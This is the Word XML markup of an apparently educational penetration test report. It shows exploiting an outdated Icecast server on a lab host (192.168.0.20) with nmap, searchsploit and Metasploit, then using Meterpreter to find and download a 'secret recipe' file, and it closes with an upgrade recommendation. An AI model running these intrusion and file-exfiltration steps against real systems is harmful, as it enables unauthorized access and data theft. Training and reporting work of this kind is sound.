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p>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GoodSecurity Penetration Test Report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0563C1"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">DesmondRattler</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="0563C1"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="36"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>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4/21/2022</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keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="259"/>
        <w:ind w:right="0" w:left="480" w:hanging="48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High-Level Summary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48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pPr>
        <w:spacing w:before="0" w:after="160" w:line="48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performing the internal penetration test, there were several alarming vulnerabilities that were</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="48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identified on Hans’ desktop. When performing the attacks, GoodSecurity was able to gain access to his machine and find the secret recipe file by exploit two programs that had major vulnerabilities. The details of the attack can be found in the ‘Findings’ category.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8"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="259"/>
        <w:ind w:right="0" w:left="480" w:hanging="48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Findings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Machine IP:</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i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.20</w:t>
      </w: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Hostname:</w:t>
      </w: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DVW10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Exploited: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Icecast Header Overwrite/ HTTP header buffer overflow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Vulnerability Explanation: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This Vulnerabillity allows an attacker to execute arbitrary code on the remote host with the privileges of the Icecast server process. To exploit this flaw, an attacker needs to send 32 HTTP headers to the remote host to overwrite a return address on the stack. This Vulnerabillity is exploitable with both CANVAS (CANVAS) and Metasploit (Icecast Header Overwrite)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Severity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>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Servere/High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Proof of Concept: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I performed a service and version scan using Nmap to determine which services are up and running: </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 namp 192.168.0.20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ran the Nmap command that performs a service and version scan against the target.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i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">namp 192.168.0.20 -sV</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previous step, I saw that the Icecast service is running. So I started by attacking that service. I searched for any Icecast exploits.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ran a SearchSploit command to show available Icecast exploits.</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 searchsploit icecast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419">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:432.000000pt;height:320.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once I found which exploits are available, I started using Metasploit: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ran the command that starts Metasploit:</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 msfconsole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searched for the Icecast module and loaded it for use.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Command to search for the Icecast module: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msf5&gt; search icecast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719">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:432.000000pt;height:335.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Commands to use the Icecast module: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msf5&gt; use exploit/windows/http/icecast_header OR  msf5&gt; use icecast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used the command below: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msf5&gt; use icecast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set the RHOST to the target machine.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Command that sets the RHOST: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msf5&gt; set RHOSTS 192.168.0.20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7304">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:432.000000pt;height:365.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I ran the Icecast exploit using the command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msf5&gt; run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934">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000003" style="width:432.000000pt;height:96.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ran the command below that performs a search for the secretfile.txt on the target machine.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meterpreter&gt;  search -f *secretfile* .txt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170">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000004" style="width:432.000000pt;height:58.5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also ran a command to perform a search for the recipe.txt on the target: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meterpreter&gt;  search -f *recipe* .txt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1574">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000005" style="width:432.000000pt;height:78.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also able to run a command that exfiltrates the recipe*.txt file from the target machine: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meterpreter&gt; download Drinks.recipe.txt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169">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000006" style="width:432.000000pt;height:208.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Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">(once I was back onto my host machine I read the enclosed drink recipe)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149">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000007" style="width:432.000000pt;height:157.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B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">----&gt; "PUT THE LIME IN THE COCONUT AND DRINK IT ALL UP!"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Meterpreter post script that enumerates all logged on users is readilly availble for hackers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shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; use 206</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135">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000008" style="width:432.000000pt;height:156.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was able to open a Meterpreter shell.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2"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">msf5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit(windows/http/icecast_header) &gt; run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ran a command that displays the target's computer system information:</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i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; ifconfig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059">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000009" style="width:432.000000pt;height:302.9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keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="259"/>
        <w:ind w:right="0" w:left="480" w:hanging="48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32"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFF00"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Overall, I recommend that GoodCorp transefers to a more updated Icecast sever (Upgrade to Icecast 2.0.2 or later).</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4">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">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9.bin" Id="docRId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="styles.xml" Id="docRId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"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mailto:YOURNAMEHERE@GoodSecurity.com"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numbering.xml" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering"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